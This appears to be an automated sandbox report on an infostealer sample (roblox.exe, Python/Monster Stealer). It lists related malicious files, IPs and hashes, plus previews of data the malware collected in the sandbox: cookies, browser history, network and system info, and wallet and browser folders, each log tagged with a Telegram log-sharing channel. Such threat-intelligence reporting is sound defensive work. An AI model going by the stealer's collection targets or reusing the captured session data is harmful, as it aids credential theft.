                                                                                                                                                                                                        135.181.65.219roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              ip-api.comroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              restores.nameroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
• 89.248.174.171
 | file.exe | malicious | LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc | 89.248.174.171
 | file.exe | malicious | Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, Vidar | 89.248.174.171
 | JGKjBsQrMc.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | 65.0.21.192
 | KfxEYxBsJm.exe | malicious | Python Stealer, Monster Stealer | 65.0.21.192
 | SecuriteInfo.com.Python.Stealer.1548.11147.30861.exe | malicious | Python Stealer, Monster Stealer | 65.0.21.192
 | SecuriteInfo.com.Win64.Evo-gen.16643.7451.exe | malicious | Python Stealer, Monster Stealer | 65.0.21.192
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE | roblox.exe | malicious | Python Stealer, Monster Stealer | 135.181.65.219
 | loligang.spc.elf | malicious | Mirai | 195.201.143.203
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 135.181.65.219
 | mipsel.nn.elf | malicious | Mirai, Okiru | 116.202.93.69
 | 3.elf | malicious | Unknown | 136.243.79.47
 | 5.msi | malicious | DanaBot, Nitol | 148.251.107.246
 | Setup.msi | malicious | Vidar | 116.203.12.114
 | https://6movies.stream/series/cobra-kai-80711/6-4/ | malicious | Unknown | 136.243.81.150
 | uEhN67huiV.dll | malicious | Unknown | 116.202.150.27
 | JkICQ13OOY.dll | malicious | Unknown | 5.9.121.207
TUT-ASUS | roblox.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | 208.95.112.1
 | x.ps1 | malicious | Quasar | 208.95.112.1
 | https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost | malicious | Unknown | 208.95.112.2
 | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Shipping Bill6239999 dated 13122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Creal.exe | malicious | Blackshades | 208.95.112.1
 | factura 000601.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
 | Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exe | malicious | AgentTesla | 208.95.112.1
No context

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd | roblox.exe | malicious | Python Stealer, Monster Stealer
 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar
 | end.exe | malicious | Unknown
 | file.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig
 | file.exe | malicious | Amadey
 | file.exe | malicious | Unknown
 | file.exe | malicious | Unknown
 | SecuriteInfo.com.Win64.Malware-gen.19901.26035.exe | malicious | Python Stealer, Monster Stealer
 | SecuriteInfo.com.Trojan.PWS.Stealer.39881.9434.15338.exe | malicious | Unknown
 | file.exe | malicious | Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 11168256
Entropy (8bit): 7.997435059161403
Encrypted: true
SSDEEP: 196608:1a4vbUQYRyS/Kh44vTM1NExeka13ZlfNf5PWwShXBFPHIG1MZBwYFCnvkC2:7vDX0gZvT2U/S3ZllEhxFPIG1rYFC8C
MD5: CD463D16CF57C3A9F5C9588A878A7213
SHA1: EF22C2B11EFC0BC6A739B82F9A26EDAEE9348B8F
SHA-256: 49F4789274E5C0DCD4D2CC1B850761353BF8B72E819D12DF5C376FD665DA1283
SHA-512: 5B20CE36B15F5D002D183850032067B11F811544BAC19E0A76340DF47294D0B059FA8DC43FEDD8480D6F72EB8357D01924DBE9CBEBDAAC1625C5F4F498392822
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 55%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....f...>..%..........@............................. ......VP....`... ..........................................................S... ..............................................`...(...................h................................text...(...........................`..`.data...............................@....rdata...*.......,..................@..@.eh_fram............................@....pdata....... ......................@..@.xdata..p....0......................@..@.bss.....<...@...........................idata..............................@....CRT....`...........................@....tls................................@....rsrc....S.......T..................@..@.reloc...............h..............@..B................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 2.0
Encrypted: false
SSDEEP: 3:qn:qn
MD5: 3F1D1D8D87177D3D8D897D7E421F84D6
SHA1: DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256: F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512: 2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious: false
Preview: blat

Process: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 536301
Entropy (8bit): 7.997837908882131
Encrypted: true
SSDEEP: 12288:Olc4PP8RcgTBuiKPpHldqu0Z+1/1DDRZJwkl7gFsoUQO7jGmGhdE:B438OgVTKPpFdqu02dwkTgmGhdE
MD5: 3E0D86D10DA4724DAA5D97CDD23FCD38
SHA1: 7CDEE77D010E9BEBF1DA0D2F42FDFA67E29A374D
SHA-256: 7D16FA4123FBBD78B85DE1B160212C10842F17D4CF37D19C942796732E46FE3B
SHA-512: 39160F0D2D97EF46E6C9195EC5CE7EAE3DD6E256C199EF942EE964409E6E00898F2A3ED338E842408B74387A6F3ED4B82169542200A61286D65DB9E677FC6ADE
Malicious: false
Preview: PK........ I.Y................Browsers/PK.........I.Y................Wallets/PK........ I.Y................network_info.txt.....0.E.@..}.m..R...p."T.'....M"...[......s.l...=....8..T..v...pM....._...e^.e^T+.....!L......;.j..^....k4>....=...@...?vd.O3.ZA.H.,..M.....PK........ I.Y{.....Ia......process_info.txt.\.n.7....?..8..0@....F..T..N.hK.H#.l.__...y.....yg=.y..\r^...V].k_.z.n.....z.|.x_..m.+/O^|..u......f~.'..7..d2.~n;..\,+?.l.o...7.7....ixc]o.~o..u...o|...G..... .....tB.>.R../.8....n....8'.<[2mT...... ....4q.E....(.L.DAl.n...]...vj.7.>{v...Y.m..?..:+.....QT.....3..i.U^QX...`....9!a..p.K.....v...1Y..Uh.)._..n......b%......H2M..>I......8..{`.U@i..J..M.1"...r..Oi..X..T.e..=E..b..YM.^..!...$.P...fE.,/...%.~....h.&-Jp.....4\0.:.tB0.Rc%*.I.`e. ..^XU..Q..!+..9i...b....#|.n>.l..5_~.!..3g6......L..QXU.Yh..p-j.N%.rH.n..a..2.d..?..LJ.%....IQ`.d<....V....6...r].&d..s.9...w!...)..(...t......,>.....8BH.uC..S.Yb.-.R).Uhw.S......e*%.......%)Wc.

Process: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 437
Entropy (8bit): 5.326754838889865
Encrypted: false
SSDEEP: 6:LgeQ1i23rsrzxbiEv3r4ZmIrBNuYraqWTfqgqlB1Hwsv7OjPy:Lge527AzkEv745BNuMWfqnym7O7y
MD5: 2D552CCDC77C802D3ED668D0FB9CAA6F
                                                                                                                                                                                                                                  SHA1:F6F61F6F2A6AE00F8C005D860EC48558F154FBF5
                                                                                                                                                                                                                                  SHA-256:FD7FDCF37BCDD14D10CB56433E8318B13BDDCBF0AC40013DC25D188A15656B45
                                                                                                                                                                                                                                  SHA-512:A220FE8C00C0B5D3B393C3FD75FEAE899F2E16CBE8B8CCB831FD7160524399C4794FBA0EB4F2DFDB2780E34ED851F23B15B8DB58B28C0BF61A273F85283F14D3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================...google.com.TRUE./.FALSE.13343559538131870.1P_JAR.2023-10-05-08...google.com.TRUE./.FALSE.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE..
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1017
                                                                                                                                                                                                                                  Entropy (8bit):5.025401594516921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:L7wrxsM0T/CrxsaQT/iWifT/QiRJT/TiCQERoT/Wier1En:L708mVcexFMwkcREn
                                                                                                                                                                                                                                  MD5:EB94A57BCE07B7CFD5571378819F7345
                                                                                                                                                                                                                                  SHA1:6F391CFB6E4DE8BA2AE6D1E8B1F2125AA8883038
                                                                                                                                                                                                                                  SHA-256:2646EAC7747EDE706599059C12D913E021E7626E0824B59D680E78AA7139B5D2
                                                                                                                                                                                                                                  SHA-512:D6961B6C5112F16FAF405C756AC8F14CEA52BFF655B28CBDD16F7A0358EF3419E67A859A21515B26750446BDF2169CFABFB960F312DC0DC66AFA403CECC3CD54
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..ID: 1 | URL: https://support.mozilla.org/products/firefox | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 2 | URL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 3 | URL: https://www.mozilla.org/contribute/ | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 4 | URL: https://www.mozilla.org/about/ | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 5 | URL: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global | Title: None | Visit Count: 0 | Last Visit Time: None..ID: 6 | URL: https://www.mozilla.org/privacy/firefox/ | Title: None | Visit Count: 1 | Last Visit Time: 1
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                  Entropy (8bit):4.338300482640769
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:111T8N9EQVjKrIC49MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:LgeQ1ip0X3RwwN3UuJA01K5CLpqI
                                                                                                                                                                                                                                  MD5:ED34788824AB4BBC7FD19B2E8DA67ECB
                                                                                                                                                                                                                                  SHA1:6A09A5A851A990058795092B42F07216E242B388
                                                                                                                                                                                                                                  SHA-256:961DBE546270EF81076A7428872B2DBC138D21A29586BF36FCDFFAB55278F821
                                                                                                                                                                                                                                  SHA-512:BA06CCDD803DDE470627FCBE3AC4D0E8EEDFE8B2F32676B0159DF9A9C6863A560C121E71A33FFD6C5262BC3DD776D4D13EB1C8B999A95404160083876B82041E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24905
                                                                                                                                                                                                                                  Entropy (8bit):4.718806775318882
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JKDxgUteG6DVBkJnhAGwGlt2FHxDxoAcUPINFKPy2k1v9MHyyITGjfpQ/KlKRCGA:FsJ/Sve+
                                                                                                                                                                                                                                  MD5:C0B52B311900457F2A120D25D682373E
                                                                                                                                                                                                                                  SHA1:6F0BC33422294BFD76FEF460B508C030FE71A9FD
                                                                                                                                                                                                                                  SHA-256:2213627AC92E25BC1C13B2E04A7498B08542036598418F29019A88B5D168BA2D
                                                                                                                                                                                                                                  SHA-512:0FCA949CE34C344B145F6E6041D0B0A60EF33A50040181A59F3C8A1786A0999FAA70E87CE525C67BFE78C1BA88590941BB0CEC9FC9F559FE6EB1979505765ED2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 180 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 78'564 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'204 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'160 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'972 K......Image Name: winlogon.exe...PID:
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):546672
                                                                                                                                                                                                                                  Entropy (8bit):7.942073518878461
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:RTe1RCLr/EwqjfZls5tabuQBaCyVkKNa4MyJaB:RGirhqTHaQBI1NVgB
                                                                                                                                                                                                                                  MD5:E5EDA853E64D1F5833AAB6A0EAEC451D
                                                                                                                                                                                                                                  SHA1:DA7EA2597E95205D9A8798A4EA22CB71F4E65007
                                                                                                                                                                                                                                  SHA-256:8AA006C0B0DE65E654E43A6985E64C3A517A04138DA9FBDC3C80F4D64EA9B9A7
                                                                                                                                                                                                                                  SHA-512:AAD5C44A5DB512DA192A458685922BBC181A277A629538EC037DB4C33FE8B882F6668C830947271ECEC4700F74EC84E97FC3F801D480C002FE58695916643362
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.e........j..y......Y..L.....[.~.n.+LQ.g........%!..{Sxo.0....o..2x.7B...'........<.2..2~k}:"~..'O.j...Ir.'nh....6....[Q..{...7.....g.l7.u.\...0..F.......s.%;bOKvM............o..W...w.Evy9.e.|>\.....".X...".o.......$;.Fz.[....5.o.E...'=.:. I......zm.r.CJ..W:"+..`.I...N...\v..~..oiIv.... =...TN.\';...9.."....m...}..}.%......8..TJ..u. =..:.cZS=....fG?..Q.dG>..|.F..g. W=.@.Fc.cH.x...X.q...T..z.N..a.-.O...]..r.C..G.'........}@...].N0f....\r...]7.....kM..+..~..=]...r.k.....4..\_.8.I.}......r...}..?...:h].u...u..k......?w...g.K.^.V.>....g.9....]..w#|M.o...:.n.|?..".1..}.Y+Cks...m..P.k......2...\.H{W.s#.[.z.....................?...w.Kg,........m2}I...ke.:.?.c..c.........].Z......O.{N_.`..50...y......%~L........:r....d..IK\6qq.wO...C....>o..C......b-m...f......V..D_7~..L...}r.....FL....z...\:na.K...9..y<.9=O{t.......s....5..G.}h...g1..L.
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142599
                                                                                                                                                                                                                                  Entropy (8bit):4.363440534336225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:IdUX+DlXP3yliETe+9THzgbnGYqTd47N1bTtd+hw45VJhj8n0WFD8FlZlP3gjQYq:IdrFkb
                                                                                                                                                                                                                                  MD5:FAF536F1EFAEB0C24F68C2467CBD8B05
                                                                                                                                                                                                                                  SHA1:8E0F38864D311F8809F4C730D015AF1F411EEB28
                                                                                                                                                                                                                                  SHA-256:5B87BF05D6BB8C590A4F04394EA6C80AB656F09D18A84BD55647A698508089DB
                                                                                                                                                                                                                                  SHA-512:9640ABE50F534BA73D10203EA18600DA2214C247E45A5B1AC2FCF9D946B94B3A944E65A464D165134F12D766B8974D6749EE4BE2953D79B9054012D274D39423
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:----------------------https://t.me/TaroCloudFreelogs----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71431-70569-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 10:34:23...System Manufacturer: H2hEcmn5xdEAHT6...System Model: xRpxRRt9...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]
                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6732424250451717
Encrypted:false
SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):155648
Entropy (8bit):0.5407252242845243
Encrypted:false
SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:7B955D976803304F2C0505431A0CF1CF
SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:false
Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):155648
Entropy (8bit):0.5407252242845243
Encrypted:false
SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:7B955D976803304F2C0505431A0CF1CF
SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:false
Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):51200
Entropy (8bit):0.8746135976761988
Encrypted:false
SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:9E68EA772705B5EC0C83C2A97BB26324
SHA1:243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):196608
Entropy (8bit):1.1209886597424439
Encrypted:false
SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:false
Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
